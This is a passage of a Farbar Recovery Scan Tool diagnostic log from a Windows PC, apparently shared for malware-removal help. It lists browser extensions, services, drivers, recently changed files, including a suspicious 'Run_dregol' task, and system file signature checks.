FF HKLM-x32\...\Firefox\Extensions: [{01A8CA0A-4C96-465b-A49B-65C46FAD54F9}] - C:\Program Files (x86)\Adobe\Adobe Contribute CS5\Plugins\FirefoxPlugin\{01A8CA0A-4C96-465b-A49B-65C46FAD54F9}
FF Extension: Adobe Contribute Toolbar - C:\Program Files (x86)\Adobe\Adobe Contribute CS5\Plugins\FirefoxPlugin\{01A8CA0A-4C96-465b-A49B-65C46FAD54F9} [2012-10-31]
FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor
FF HKLM-x32\...\Thunderbird\Extensions: [
msktbird@mcafee.com] - C:\Program Files\McAfee\MSK
FF Extension: McAfee Anti-Spam Thunderbird Extension - C:\Program Files\McAfee\MSK [2012-08-30]
FF HKU\S-1-5-21-3654736093-338424075-1572945638-1002\...\Firefox\Extensions: [{e4f94d1e-2f53-401e-8885-681602c0ddd8}] - C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi
FF Extension: No Name - C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi [2014-04-04]
StartMenuInternet: FIREFOX.EXE - firefox.exe
Chrome:
=======
CHR Profile: C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Adblock Plus) - C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2015-04-06]
CHR Extension: (SiteAdvisor) - C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2015-02-24]
CHR Extension: (Bookmark Manager) - C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\gmlllbghnfkpflemihljekbapjopfjik [2015-07-14]
CHR Extension: (No Name) - C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihokndmjeombjojnfkmapfnjeghjohim [2015-07-14]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-03-16]
CHR Extension: (Skype Click to Call) - C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2015-02-24]
CHR Extension: (Google Wallet) - C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-02-24]
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2015-07-17]
CHR HKLM\...\Chrome\Extension: [ihokndmjeombjojnfkmapfnjeghjohim] -
https://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-3654736093-338424075-1572945638-1002\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ihokndmjeombjojnfkmapfnjeghjohim] -
https://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [bopakagnckmlgajfccecajhnimjiiedh] -
http://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2015-07-17]
CHR HKLM-x32\...\Chrome\Extension: [ihokndmjeombjojnfkmapfnjeghjohim] -
https://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2015-05-01]
==================== Services (Whitelisted) =================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 ASUS InstantOn; C:\Program Files (x86)\ASUS\InstantOn for NB\InsOnSrv.exe [277120 2012-02-16] (ASUS)
R2 AsusUacSvc; C:\Program Files\Asus\Rotation Desktop for G Series\AsusUacSvc.exe [113840 2011-03-27] () [File not signed]
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [106144 2011-12-29] (Atheros Commnucations) [File not signed]
S3 BRSptStub; C:\ProgramData\BitRaider\BRSptStub.exe [363208 2015-03-24] (BitRaider, LLC)
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1394816 2015-05-01] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1772672 2015-05-01] (Microsoft Corporation)
R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2739888 2015-05-19] (Microsoft Corporation)
S3 EasyAntiCheat; C:\Windows\SysWOW64\EasyAntiCheat.exe [237864 2015-02-28] (EasyAntiCheat Ltd)
R2 EpsonBidirectionalService; C:\Program Files (x86)\Common Files\EPSON\EBAPI\eEBSVC.exe [94208 2006-12-19] (SEIKO EPSON CORPORATION) [File not signed]
R2 FanChkService; C:\Program Files (x86)\ASUS\ASUS Fan Filter Checker\FanChkSrv.exe [45696 2012-01-20] (ASUSTek Computer Inc.)
S2 HiPatchService; C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe [9216 2015-03-12] (Hi-Rez Studios) [File not signed]
R2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [340744 2015-05-06] (McAfee, Inc.)
R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [128280 2012-02-21] ()
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [161560 2012-02-21] (Intel Corporation)
R2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [155368 2015-07-03] (McAfee, Inc.)
R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [754280 2015-05-13] (McAfee, Inc.)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe [289256 2014-04-09] (McAfee, Inc.)
R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\1.5.495.0\McCSPServiceHost.exe [207344 2015-06-04] (McAfee, Inc.)
R2 McMPFSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [340744 2015-05-06] (McAfee, Inc.)
R2 McNaiAnn; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [340744 2015-05-06] (McAfee, Inc.)
S3 McODS; C:\Program Files\McAfee\VirusScan\mcods.exe [609592 2015-05-05] (McAfee, Inc.)
R2 mcpltsvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [340744 2015-05-06] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [340744 2015-05-06] (McAfee, Inc.)
R2 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [232656 2015-04-08] (McAfee, Inc.)
R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [373704 2015-05-14] (McAfee, Inc.)
R2 mfevtp; C:\Windows\system32\mfevtps.exe [250672 2015-04-08] (McAfee, Inc.)
R2 MSK80Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [340744 2015-05-06] (McAfee, Inc.)
S3 npggsvc; C:\Windows\SysWOW64\GameMon.des [4145600 2012-06-20] (INCA Internet Co., Ltd.)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [15125280 2013-11-08] (NVIDIA Corporation)
R2 RzWizardService; C:\Program Files (x86)\Razer\RzWizard\RzWizardService.exe [367616 2014-10-19] (Razer Inc.) [File not signed]
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
R2 VIAKaraokeService; C:\Windows\system32\viakaraokesrv.exe [27760 2012-03-22] (VIA Technologies, Inc.)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-26] (Microsoft Corporation)
R2 WTabletServicePro; C:\Program Files\Tablet\Wacom\WTabletServicePro.exe [613760 2012-10-29] (Wacom Technology, Corp.)
R2 ZAtheros Bt&Wlan Coex Agent; C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe [158880 2011-12-29] (Atheros) [File not signed]
==================== Drivers (Whitelisted) ====================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R3 AiCharger; C:\Windows\SysWOW64\DRIVERS\AiCharger.sys [17152 2012-02-29] (ASUSTek Computer Inc.)
R3 cfwids; C:\Windows\System32\drivers\cfwids.sys [68784 2015-04-08] (McAfee, Inc.)
S3 CM2793; C:\Windows\System32\DRIVERS\CM2793.sys [14840 2010-09-17] ()
S3 CM2793; C:\Windows\SysWOW64\DRIVERS\CM2793.sys [12280 2010-09-17] ()
S3 ElgatoGC658Y; C:\Windows\System32\Drivers\ElgatoGC658.sys [50288 2012-11-12] (UB658)
S3 HipShieldK; C:\Windows\System32\drivers\HipShieldK.sys [198448 2015-04-27] (McAfee, Inc.)
R3 kbfiltr; C:\Windows\System32\DRIVERS\kbfiltr.sys [15416 2009-07-19] ( )
R3 ManyCam; C:\Windows\System32\DRIVERS\mcvidrv_x64.sys [44928 2012-10-10] (ManyCam LLC)
R3 mcaudrv_simple; C:\Windows\System32\drivers\mcaudrv_x64.sys [28160 2013-01-30] (ManyCam LLC)
R2 McPvDrv; C:\Windows\system32\drivers\McPvDrv.sys [76064 2015-05-08] (McAfee, Inc.)
R3 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [402888 2015-04-08] (McAfee, Inc.)
R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [338272 2015-04-08] (McAfee, Inc.)
R0 mfedisk; C:\Windows\System32\DRIVERS\mfedisk.sys [101872 2015-04-08] (McAfee, Inc.)
R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [488000 2015-04-08] (McAfee, Inc.)
R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [864200 2015-04-08] (McAfee, Inc.)
R3 mfencbdc; C:\Windows\System32\DRIVERS\mfencbdc.sys [483240 2015-03-26] (McAfee, Inc.)
S3 mfencrk; C:\Windows\System32\DRIVERS\mfencrk.sys [100720 2015-03-26] (McAfee, Inc.)
R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [335944 2015-04-08] (McAfee, Inc.)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [39200 2013-09-27] (NVIDIA Corporation)
S3 S3XXx64; C:\Windows\System32\DRIVERS\S3XXx64.sys [73856 2015-02-17] (Identiv)
R3 SmbDrv; C:\Windows\System32\DRIVERS\Smb_driver.sys [22800 2012-01-25] (Synaptics Incorporated)
S3 SzCCID; C:\Windows\System32\DRIVERS\SzCCID.sys [37888 2010-05-14] (Generic)
S3 BRDriver64_1_3_3_E02B25FC; \??\C:\ProgramData\BitRaider\support\1.3.3\E02B25FC\BRDriver64.sys [X]
S1 csfd_1_10_0_17; system32\drivers\csfd_1_10_0_17.sys [X]
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2015-07-17 18:02 - 2015-07-17 18:04 - 00037523 _____ C:\Users\J. Powers\Downloads\FRST.txt
2015-07-17 18:02 - 2015-07-17 18:03 - 00000000 ____D C:\FRST
2015-07-17 18:02 - 2015-07-17 18:02 - 02133504 _____ (Farbar) C:\Users\J. Powers\Downloads\FRST64.exe
2015-07-17 17:20 - 2015-07-17 17:20 - 00000802 _____ C:\blitzblank.log
2015-07-17 17:17 - 2015-07-17 17:17 - 01153912 _____ (Emsi Software GmbH) C:\Users\J. Powers\Downloads\BlitzBlank.exe
2015-07-17 17:08 - 2015-07-17 17:08 - 01943800 _____ (Bleeping Computer, LLC) C:\Users\J. Powers\Downloads\iExplore.exe
2015-07-17 17:08 - 2015-07-17 17:08 - 01063160 _____ (Bleeping Computer, LLC) C:\Users\J. Powers\Downloads\iExplore64.exe
2015-07-16 20:30 - 2015-07-16 20:30 - 00000122 _____ C:\Users\J. Powers\Desktop\Skyforge My.com.url
2015-07-16 20:30 - 2015-07-16 20:30 - 00000000 ____D C:\Users\J. Powers\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\My.com
2015-07-16 19:49 - 2015-07-16 19:49 - 00000000 ____D C:\ProgramData\Kaspersky Lab Setup Files
2015-07-16 19:13 - 2015-07-17 17:14 - 00003542 _____ C:\Users\J. Powers\Desktop\Rkill.txt
2015-07-16 18:11 - 2015-07-16 18:16 - 00000000 ____D C:\AdwCleaner
2015-07-16 17:58 - 2015-07-16 19:37 - 00000000 ____D C:\MyGames
2015-07-16 17:57 - 2015-07-17 16:33 - 00000000 ____D C:\Users\J. Powers\AppData\Local\MyComGames
2015-07-14 16:59 - 2015-07-14 16:59 - 00097888 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2015-07-14 16:57 - 2015-07-14 16:57 - 00562784 _____ (Oracle Corporation) C:\Users\J. Powers\Downloads\jxpiinstall(1).exe
2015-07-12 19:59 - 2015-07-12 19:59 - 00000222 _____ C:\Users\J. Powers\Desktop\ARK Survival Evolved.url
2015-07-11 12:13 - 2015-07-11 12:13 - 00000000 ____D C:\Users\J. Powers\AppData\Roaming\TheBannerSaga
2015-07-11 08:11 - 2015-07-11 08:11 - 00000222 _____ C:\Users\J. Powers\Desktop\The Banner Saga.url
2015-06-29 19:54 - 2015-06-29 19:54 - 00347816 _____ (Microsoft Corporation) C:\Users\J. Powers\Downloads\MicrosoftFixit.AudioRecording.RNP.Run.exe
2015-06-27 21:45 - 2015-05-08 01:42 - 00076064 _____ (McAfee, Inc.) C:\Windows\system32\Drivers\McPvDrv.sys
2015-06-27 21:44 - 2015-04-27 08:02 - 00198448 _____ (McAfee, Inc.) C:\Windows\system32\Drivers\HipShieldK.sys
2015-06-27 21:42 - 2015-06-27 21:42 - 00003064 _____ C:\Windows\System32\Tasks\McAfeeLogon
2015-06-27 19:13 - 2015-06-27 19:13 - 00000000 ____H C:\Users\J. Powers\AppData\Local\BIT844E.tmp
2015-06-27 19:02 - 2015-06-27 19:02 - 00000000 _____ C:\Users\J. Powers\AppData\Local\{06E1A57F-8411-4354-B732-E6CA0DAC789D}
2015-06-22 21:17 - 2015-06-22 21:17 - 00000000 ____D C:\Windows\system32\McAfee File Lock
2015-06-22 12:28 - 2015-06-22 12:28 - 00000000 ____D C:\Users\J. Powers\AppData\Roaming\ooVoo Details
2015-06-22 12:27 - 2015-06-22 12:27 - 00001859 _____ C:\Users\Public\Desktop\ooVoo.lnk
2015-06-22 12:27 - 2015-06-22 12:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ooVoo
2015-06-22 12:27 - 2015-06-22 12:27 - 00000000 ____D C:\Program Files (x86)\ooVoo
2015-06-22 12:26 - 2015-06-22 12:26 - 02388000 _____ (ooVoo LLC) C:\Users\J. Powers\Downloads\ooVooSetup.exe
2015-06-21 16:45 - 2015-06-21 16:45 - 00000222 _____ C:\Users\J. Powers\Desktop\Sunless Sea.url
2015-06-19 22:41 - 2015-06-19 22:41 - 821670783 _____ C:\Windows\MEMORY.DMP
2015-06-19 22:41 - 2015-06-19 22:41 - 00291584 _____ C:\Windows\Minidump\061915-43649-01.dmp
2015-06-19 22:41 - 2015-06-19 22:41 - 00000000 ____D C:\Windows\Minidump
2015-06-17 23:32 - 2015-06-27 20:03 - 00000135 _____ C:\Users\J. Powers\AppData\Roaming\WB.CFG
2015-06-17 16:03 - 2015-07-17 18:03 - 00000312 _____ C:\Windows\Tasks\Run_dregol.job
2015-06-17 16:03 - 2015-07-17 16:34 - 00000000 ____D C:\Users\J. Powers\AppData\Roaming\Run_dregol
2015-06-17 16:03 - 2015-07-17 16:34 - 00000000 ____D C:\Program Files (x86)\Run_Dregol
2015-06-17 16:03 - 2015-06-17 16:03 - 00003256 _____ C:\Windows\System32\Tasks\Run_dregol
2015-06-17 14:55 - 2015-06-17 14:55 - 00000017 _____ C:\Users\J. Powers\AppData\Local\si
2015-06-17 14:21 - 2015-06-29 21:48 - 00000000 ____D C:\Users\J. Powers\AppData\Local\Chromium
2015-06-17 14:21 - 2015-06-17 16:20 - 00000981 _____ C:\Users\J. Powers\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\iPadian.lnk
2015-06-17 14:20 - 2015-06-17 16:30 - 00000000 ____D C:\Program Files (x86)\iPadian
==================== One Month Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2015-07-17 17:58 - 2012-08-30 21:00 - 00000000 ____D C:\Users\J. Powers\AppData\Roaming\Skype
2015-07-17 17:52 - 2012-08-01 08:56 - 01067455 _____ C:\Windows\WindowsUpdate.log
2015-07-17 17:35 - 2009-07-13 18:45 - 00018736 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-07-17 17:35 - 2009-07-13 18:45 - 00018736 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-07-17 17:31 - 2014-03-22 19:55 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
2015-07-17 17:29 - 2014-03-22 19:56 - 00000000 __RSD C:\Users\J. Powers\Documents\McAfee Vaults
2015-07-17 17:24 - 2014-11-29 19:55 - 00009132 _____ C:\Windows\setupact.log
2015-07-17 17:23 - 2012-11-25 11:20 - 00000000 ____D C:\ProgramData\Kodak
2015-07-17 17:23 - 2012-08-01 11:28 - 00000380 _____ C:\Users\J. Powers\AppData\Roaming\sp_data.sys
2015-07-17 17:22 - 2012-08-30 21:21 - 00000000 ____D C:\Program Files (x86)\McAfee
2015-07-17 17:22 - 2012-08-01 09:01 - 00000828 _____ C:\Windows\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon.job
2015-07-17 17:22 - 2012-02-17 21:03 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-07-17 17:21 - 2015-02-24 20:08 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d050c18a1d0b1d.job
2015-07-17 17:21 - 2012-08-01 08:58 - 00000000 ____D C:\ProgramData\NVIDIA
2015-07-17 17:21 - 2009-07-13 19:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-07-17 17:20 - 2014-12-02 19:38 - 00053630 _____ C:\Windows\PFRO.log
2015-07-17 17:19 - 2012-08-30 21:07 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-07-17 17:15 - 2015-02-24 20:08 - 00003894 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA1d050c18a1d0b1d
2015-07-17 17:15 - 2012-02-17 21:03 - 00003642 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2015-07-17 17:15 - 2012-02-17 21:03 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-07-17 16:51 - 2014-11-06 16:21 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2015-07-17 16:49 - 2014-12-26 09:07 - 00003886 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2015-07-17 16:36 - 2012-08-01 12:25 - 00000000 ____D C:\Users\J. Powers
2015-07-17 16:34 - 2015-06-02 12:21 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2015-07-17 16:34 - 2015-04-04 08:50 - 00000000 ___SD C:\Windows\SysWOW64\GWX
2015-07-17 16:34 - 2015-04-04 08:50 - 00000000 ___SD C:\Windows\system32\GWX
2015-07-17 16:34 - 2014-12-12 14:47 - 00000000 ____D C:\Windows\system32\appraiser
2015-07-17 16:34 - 2014-05-10 03:00 - 00000000 ___SD C:\Windows\system32\CompatTel
2015-07-17 16:34 - 2013-11-16 20:20 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2015-07-17 16:34 - 2013-07-13 02:35 - 00000000 ____D C:\Program Files (x86)\Steam
2015-07-17 16:34 - 2013-02-28 04:56 - 00000000 ____D C:\ProgramData\McAfee Security Scan
2015-07-17 16:34 - 2013-02-09 17:19 - 00000000 ___RD C:\Program Files (x86)\Skype
2015-07-17 16:34 - 2012-08-30 22:58 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2015-07-17 16:34 - 2012-08-01 09:09 - 00000000 ____D C:\ProgramData\P4G
2015-07-17 16:34 - 2009-07-13 17:20 - 00000000 ____D C:\Windows\PolicyDefinitions
2015-07-17 16:34 - 2009-07-13 17:20 - 00000000 ____D C:\Program Files\Common Files\Microsoft Shared
2015-07-17 16:33 - 2013-09-08 21:18 - 00000000 ____D C:\Program Files (x86)\Java
2015-07-17 16:33 - 2013-08-24 22:24 - 00000000 ____D C:\Program Files (x86)\LyricSing
2015-07-17 16:33 - 2009-07-13 17:20 - 00000000 ____D C:\Windows\registration
2015-07-17 16:31 - 2013-11-16 20:21 - 00000000 ____D C:\ProgramData\Oracle
2015-07-17 16:31 - 2012-08-30 21:00 - 00000000 ____D C:\ProgramData\Skype
2015-07-16 19:42 - 2012-09-01 15:45 - 00000000 ____D C:\Users\J. Powers\AppData\Local\CrashDumps
2015-07-14 19:39 - 2012-08-01 09:01 - 00000830 _____ C:\Windows\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d.job
2015-07-14 18:46 - 2012-08-30 21:07 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2015-07-14 17:19 - 2012-08-30 21:07 - 00778416 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2015-07-14 17:19 - 2012-08-30 21:07 - 00142512 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2015-07-12 19:59 - 2013-07-13 02:55 - 00000000 ____D C:\Users\J. Powers\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2015-07-08 14:37 - 2012-10-29 13:28 - 00000000 ____D C:\Users\J. Powers\AppData\Local\Adobe
2015-06-27 21:45 - 2012-08-30 21:21 - 00000000 ____D C:\Program Files\Common Files\McAfee
2015-06-27 19:03 - 2009-07-13 19:13 - 00782470 _____ C:\Windows\system32\PerfStringBackup.INI
2015-06-24 01:31 - 2013-04-16 18:32 - 00000000 ____D C:\Program Files\Microsoft Office 15
2015-06-17 16:03 - 2012-08-30 22:58 - 00001132 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
==================== Files in the root of some directories =======
2013-02-16 16:43 - 2013-02-16 16:43 - 0000132 _____ () C:\Users\J. Powers\AppData\Roaming\Adobe BMP Format CS5 Prefs
2012-08-01 11:28 - 2015-07-17 17:23 - 0000380 _____ () C:\Users\J. Powers\AppData\Roaming\sp_data.sys
2015-06-17 23:32 - 2015-06-27 20:03 - 0000135 _____ () C:\Users\J. Powers\AppData\Roaming\WB.CFG
2015-06-27 19:13 - 2015-06-27 19:13 - 0000000 ____H () C:\Users\J. Powers\AppData\Local\BIT844E.tmp
2015-06-17 14:55 - 2015-06-17 14:55 - 0000017 _____ () C:\Users\J. Powers\AppData\Local\si
2015-06-27 19:02 - 2015-06-27 19:02 - 0000000 _____ () C:\Users\J. Powers\AppData\Local\{06E1A57F-8411-4354-B732-E6CA0DAC789D}
2015-05-14 18:06 - 2015-05-14 18:06 - 0000231 _____ () C:\ProgramData\HirezPipeError.txt
2013-04-14 16:10 - 2013-04-14 19:05 - 0000774 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
2012-08-01 09:14 - 2012-08-01 09:14 - 0000109 _____ () C:\ProgramData\{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}.log
2012-08-01 09:13 - 2012-08-01 09:13 - 0000105 _____ () C:\ProgramData\{40BF1E83-20EB-11D8-97C5-0009C5020658}.log
2012-08-01 09:13 - 2012-08-01 09:13 - 0000107 _____ () C:\ProgramData\{C59C179C-668D-49A9-B6EA-0121CCFC1243}.log
Some files in TEMP:
====================
C:\Users\J. Powers\AppData\Local\Temp\HiPatchSelfUpdateWindow.exe
C:\Users\J. Powers\AppData\Local\Temp\HiRezLauncherControls.dll
C:\Users\J. Powers\AppData\Local\Temp\SkypeSetup.exe
==================== Bamital & volsnap Check =================
(There is no automatic fix for files that do not pass verification.)
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2015-06-05 09:39
==================== End of log ============================